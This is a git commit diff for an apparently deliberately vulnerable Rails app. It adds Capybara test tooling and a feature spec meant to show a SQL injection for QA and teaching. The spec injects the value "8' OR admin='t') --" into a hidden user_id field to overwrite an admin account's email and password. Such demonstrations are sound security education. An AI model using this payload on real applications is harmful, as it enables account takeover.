Capybara added to demonstrate vulnerabilities.

Adding Capybara to verify replay-ability of hacking vulnerabilities. I
imagine these may want to be kept on a different branch for QA and
educational purposes, but not distributed with master when forked.

This commit also includes demonstrating the SQL Injection vulnerability.

.gitignore

@@ -6,3 +6,4 @@
 .elasticbeanstalk/
 .DS_Store
 /public/data
+*.png

Gemfile

@@ -25,6 +25,9 @@ end
 gem 'gauntlt'
 
 group :development, :test do
+  gem 'capybara'
+  gem 'database_cleaner'
+  gem 'poltergeist'
   gem 'rspec-rails'
 end
 
@@ -56,7 +59,7 @@ gem 'jquery-rails'
 gem 'powder'
 
 gem 'aruba'
-gem 'minitest', '~> 4.0', :require=> "minitest/autorun"
+#gem 'minitest', '~> 4.0', :require=> "minitest/autorun"
 
 #gem 'minitest'
 

Gemfile.lock

@@ -48,8 +48,15 @@ GEM
     builder (3.0.4)
     bundler-audit (0.1.2)
       bundler (~> 1.2)
+    capybara (2.1.0)
+      mime-types (>= 1.16)
+      nokogiri (>= 1.3.3)
+      rack (>= 1.0.0)
+      rack-test (>= 0.5.4)
+      xpath (~> 2.0)
     childprocess (0.3.9)
       ffi (~> 1.0, >= 1.0.11)
+    cliver (0.2.2)
     coderay (1.0.9)
     coffee-rails (3.2.2)
       coffee-script (>= 2.2.0)
@@ -63,6 +70,7 @@ GEM
       diff-lcs (>= 1.1.3)
       gherkin (~> 2.12.0)
       multi_json (~> 1.3)
+    database_cleaner (1.1.1)
     diff-lcs (1.2.4)
     em-websocket (0.5.0)
       eventmachine (>= 0.12.9)
@@ -125,9 +133,13 @@ GEM
       treetop (~> 1.4.8)
     method_source (0.8.1)
     mime-types (1.22)
-    minitest (4.7.5)
     multi_json (1.7.2)
     nokogiri (1.5.10)
+    poltergeist (1.4.1)
+      capybara (~> 2.1.0)
+      cliver (~> 0.2.1)
+      multi_json (~> 1.0)
+      websocket-driver (>= 0.2.0)
     polyglot (0.3.3)
     powder (0.2.0)
       thor (>= 0.11.5)
@@ -222,6 +234,9 @@ GEM
       kgio (~> 2.6)
       rack
       raindrops (~> 0.7)
+    websocket-driver (0.3.0)
+    xpath (2.0.0)
+      nokogiri (~> 1.3)
 
 PLATFORMS
   ruby
@@ -231,7 +246,9 @@ DEPENDENCIES
   bcrypt-ruby
   brakeman
   bundler-audit
+  capybara
   coffee-rails (~> 3.2.1)
+  database_cleaner
   execjs
   foreman
   gauntlt
@@ -241,7 +258,7 @@ DEPENDENCIES
   guard-shell
   jquery-fileupload-rails
   jquery-rails
-  minitest (~> 4.0)
+  poltergeist
   powder
   pry
   rack-livereload

Gemfile.lock.orig

@@ -1,255 +0,0 @@
-GEM
-  remote: https://rubygems.org/
-  specs:
-    actionmailer (3.2.13)
-      actionpack (= 3.2.13)
-      mail (~> 2.5.3)
-    actionpack (3.2.13)
-      activemodel (= 3.2.13)
-      activesupport (= 3.2.13)
-      builder (~> 3.0.0)
-      erubis (~> 2.7.0)
-      journey (~> 1.0.4)
-      rack (~> 1.4.5)
-      rack-cache (~> 1.2)
-      rack-test (~> 0.6.1)
-      sprockets (~> 2.2.1)
-    activemodel (3.2.13)
-      activesupport (= 3.2.13)
-      builder (~> 3.0.0)
-    activerecord (3.2.13)
-      activemodel (= 3.2.13)
-      activesupport (= 3.2.13)
-      arel (~> 3.0.2)
-      tzinfo (~> 0.3.29)
-    activeresource (3.2.13)
-      activemodel (= 3.2.13)
-      activesupport (= 3.2.13)
-    activesupport (3.2.13)
-      i18n (= 0.6.1)
-      multi_json (~> 1.0)
-    arel (3.0.2)
-    aruba (0.5.3)
-      childprocess (>= 0.3.6)
-      cucumber (>= 1.1.1)
-      rspec-expectations (>= 2.7.0)
-    bcrypt-ruby (3.0.1)
-    brakeman (1.9.5)
-      erubis (~> 2.6)
-      fastercsv (~> 1.5)
-      haml (>= 3.0, < 5.0)
-      highline (~> 1.6)
-      multi_json (~> 1.2)
-      ruby2ruby (= 2.0.3)
-      ruby_parser (~> 3.1.1)
-      sass (~> 3.0)
-      slim (~> 1.3.6)
-      terminal-table (~> 1.4)
-    builder (3.0.4)
-    bundler-audit (0.1.2)
-      bundler (~> 1.2)
-    childprocess (0.3.9)
-      ffi (~> 1.0, >= 1.0.11)
-    coderay (1.0.9)
-    coffee-rails (3.2.2)
-      coffee-script (>= 2.2.0)
-      railties (~> 3.2.0)
-    coffee-script (2.2.0)
-      coffee-script-source
-      execjs
-    coffee-script-source (1.6.2)
-    cucumber (1.3.2)
-      builder (>= 2.1.2)
-      diff-lcs (>= 1.1.3)
-      gherkin (~> 2.12.0)
-      multi_json (~> 1.3)
-    diff-lcs (1.2.4)
-    em-websocket (0.5.0)
-      eventmachine (>= 0.12.9)
-      http_parser.rb (~> 0.5.3)
-    erubis (2.7.0)
-    eventmachine (1.0.3)
-    execjs (1.4.0)
-      multi_json (~> 1.0)
-    fastercsv (1.5.5)
-    ffi (1.9.0)
-    foreman (0.62.0)
-      thor (>= 0.13.6)
-    formatador (0.2.4)
-    gauntlt (1.0.5)
-      cucumber
-      nokogiri (~> 1.5.0)
-      trollop
-    gherkin (2.12.0)
-      multi_json (~> 1.3)
-    guard (1.7.0)
-      formatador (>= 0.2.4)
-      listen (>= 0.6.0)
-      lumberjack (>= 1.0.2)
-      pry (>= 0.9.10)
-      thor (>= 0.14.6)
-    guard-brakeman (0.6.3)
-      brakeman (>= 1.8.2)
-      guard (>= 1.1.0)
-    guard-livereload (1.3.0)
-      em-websocket (>= 0.2.0)
-      guard (>= 1.5.0)
-      multi_json (~> 1.0)
-    guard-rspec (2.5.4)
-      guard (>= 1.1)
-      rspec (~> 2.11)
-    guard-shell (0.5.1)
-      guard (>= 1.1.0)
-    haml (4.0.2)
-      tilt
-    hashr (0.0.22)
-    highline (1.6.16)
-    hike (1.2.2)
-    http_parser.rb (0.5.3)
-    i18n (0.6.1)
-    journey (1.0.4)
-    jquery-fileupload-rails (0.4.1)
-      actionpack (>= 3.1)
-      railties (>= 3.1)
-    jquery-rails (3.0.1)
-      railties (>= 3.0, < 5.0)
-      thor (>= 0.14, < 2.0)
-    json (1.7.7)
-    kgio (2.8.0)
-    libv8 (3.16.14.3)
-    listen (0.7.3)
-    lumberjack (1.0.3)
-    mail (2.5.3)
-      i18n (>= 0.4.0)
-      mime-types (~> 1.16)
-      treetop (~> 1.4.8)
-    method_source (0.8.1)
-    mime-types (1.22)
-    minitest (4.7.5)
-    multi_json (1.7.2)
-    nokogiri (1.5.10)
-    polyglot (0.3.3)
-    powder (0.2.0)
-      thor (>= 0.11.5)
-    pry (0.9.12)
-      coderay (~> 1.0.5)
-      method_source (~> 0.8)
-      slop (~> 3.4)
-    rack (1.4.5)
-    rack-cache (1.2)
-      rack (>= 0.4)
-    rack-livereload (0.3.15)
-      rack
-    rack-ssl (1.3.3)
-      rack
-    rack-test (0.6.2)
-      rack (>= 1.0)
-    rails (3.2.13)
-      actionmailer (= 3.2.13)
-      actionpack (= 3.2.13)
-      activerecord (= 3.2.13)
-      activeresource (= 3.2.13)
-      activesupport (= 3.2.13)
-      bundler (~> 1.0)
-      railties (= 3.2.13)
-    railties (3.2.13)
-      actionpack (= 3.2.13)
-      activesupport (= 3.2.13)
-      rack-ssl (~> 1.3.2)
-      rake (>= 0.8.7)
-      rdoc (~> 3.4)
-      thor (>= 0.14.6, < 2.0)
-    raindrops (0.10.0)
-    rake (10.0.4)
-    rb-fsevent (0.9.3)
-    rdoc (3.12.2)
-      json (~> 1.4)
-    ref (1.0.5)
-    rspec (2.14.1)
-      rspec-core (~> 2.14.0)
-      rspec-expectations (~> 2.14.0)
-      rspec-mocks (~> 2.14.0)
-    rspec-core (2.14.2)
-    rspec-expectations (2.14.0)
-      diff-lcs (>= 1.1.3, < 2.0)
-    rspec-mocks (2.14.1)
-    rspec-rails (2.14.0)
-      actionpack (>= 3.0)
-      activesupport (>= 3.0)
-      railties (>= 3.0)
-      rspec-core (~> 2.14.0)
-      rspec-expectations (~> 2.14.0)
-      rspec-mocks (~> 2.14.0)
-    ruby2ruby (2.0.3)
-      ruby_parser (~> 3.1)
-      sexp_processor (~> 4.0)
-    ruby_parser (3.1.3)
-      sexp_processor (~> 4.1)
-    sass (3.2.7)
-    sass-rails (3.2.6)
-      railties (~> 3.2.0)
-      sass (>= 3.1.10)
-      tilt (~> 1.3)
-    sexp_processor (4.2.1)
-    slim (1.3.8)
-      temple (~> 0.6.3)
-      tilt (~> 1.3.3)
-    slop (3.4.4)
-    sprockets (2.2.2)
-      hike (~> 1.2)
-      multi_json (~> 1.0)
-      rack (~> 1.0)
-      tilt (~> 1.1, != 1.3.0)
-    sqlite3 (1.3.7)
-    temple (0.6.3)
-    terminal-table (1.4.5)
-    therubyracer (0.12.0)
-      libv8 (~> 3.16.14.0)
-      ref
-    thor (0.18.1)
-    tilt (1.3.7)
-    travis-lint (1.7.0)
-      hashr (~> 0.0.22)
-    treetop (1.4.12)
-      polyglot
-      polyglot (>= 0.3.1)
-    trollop (2.0)
-    tzinfo (0.3.37)
-    uglifier (2.0.1)
-      execjs (>= 0.3.0)
-      multi_json (~> 1.0, >= 1.0.2)
-    unicorn (4.6.2)
-      kgio (~> 2.6)
-      rack
-      raindrops (~> 0.7)
-
-PLATFORMS
-  ruby
-
-DEPENDENCIES
-  aruba
-  bcrypt-ruby
-  brakeman
-  bundler-audit
-  coffee-rails (~> 3.2.1)
-  execjs
-  foreman
-  gauntlt
-  guard-brakeman
-  guard-livereload
-  guard-rspec
-  guard-shell
-  jquery-fileupload-rails
-  jquery-rails
-  minitest (~> 4.0)
-  powder
-  rack-livereload
-  rails (= 3.2.13)
-  rb-fsevent
-  rspec-rails
-  sass-rails (~> 3.2.3)
-  sqlite3
-  therubyracer
-  travis-lint
-  uglifier (>= 1.0.3)
-  unicorn

spec/features/sql_injection_spec.rb

@@ -0,0 +1,37 @@
+require 'spec_helper'
+
+feature 'sql injection' do
+  before do
+    User.delete_all
+    Rails.application.load_seed
+    @normal_user = User.create!(:first_name => 'Joe', :last_name => 'Schmoe',
+                                :email => 'joe@schmoe.com', :password => 'aoeuaoeu', :password_confirmation => 'aoeuaoeu')
+    @admin_user = User.where("admin='t'").first
+  end
+
+  scenario 'injection attack on account_settings' do
+    @admin_user.admin.should be_true
+
+    visit '/'
+    within('.signup') do
+      fill_in 'email', :with => 'joe@schmoe.com'
+      fill_in 'password', :with => 'aoeuaoeu'
+    end
+    click_on 'Login'
+
+    visit "/users/#{@normal_user.user_id}/account_settings"
+    within('#account_edit') do
+      fill_in 'Email', :with => 'joe.admin@schmoe.com'
+      fill_in 'user_password', :with => 'hacketyhack'
+      fill_in 'user_password_confirmation', :with => 'hacketyhack'
+
+      # this is a hidden field, so cannot use fill_in to access it.
+      find(:xpath, "//input[@id='user_user_id']", :visible => false).set "8' OR admin='t') --"
+    end
+    click_on 'Submit'
+
+    @admin_user = User.where("admin='t'").first
+    @admin_user.email.should == 'joe.admin@schmoe.com'
+    @admin_user.admin.should == true
+  end
+end

spec/spec_helper.rb

@@ -3,6 +3,9 @@ ENV["RAILS_ENV"] ||= 'test'
 require File.expand_path("../../config/environment", __FILE__)
 require 'rspec/rails'
 require 'rspec/autorun'
+require 'capybara/rails'
+require 'capybara/poltergeist'
+require 'database_cleaner'
 
 # Requires supporting ruby files with custom matchers and macros, etc,
 # in spec/support/ and its subdirectories.
@@ -23,7 +26,7 @@ RSpec.configure do |config|
   # If you're not using ActiveRecord, or you'd prefer not to run each of your
   # examples within a transaction, remove the following line or assign false
   # instead of true.
-  config.use_transactional_fixtures = true
+  config.use_transactional_fixtures = false # Capybara Poltergeist driver requires this
 
   # If true, the base class of anonymous controllers will be inferred
   # automatically. This will be the default behavior in future versions of
@@ -35,4 +38,16 @@ RSpec.configure do |config|
   # the seed, which is printed after each run.
   #     --seed 1234
   config.order = "random"
+
+  config.before(:each) do
+    DatabaseCleaner.start
+  end
+
+  config.after(:each) do
+    DatabaseCleaner.clean
+  end
 end
+
+Capybara.javascript_driver = :poltergeist
+
+DatabaseCleaner.strategy = :truncation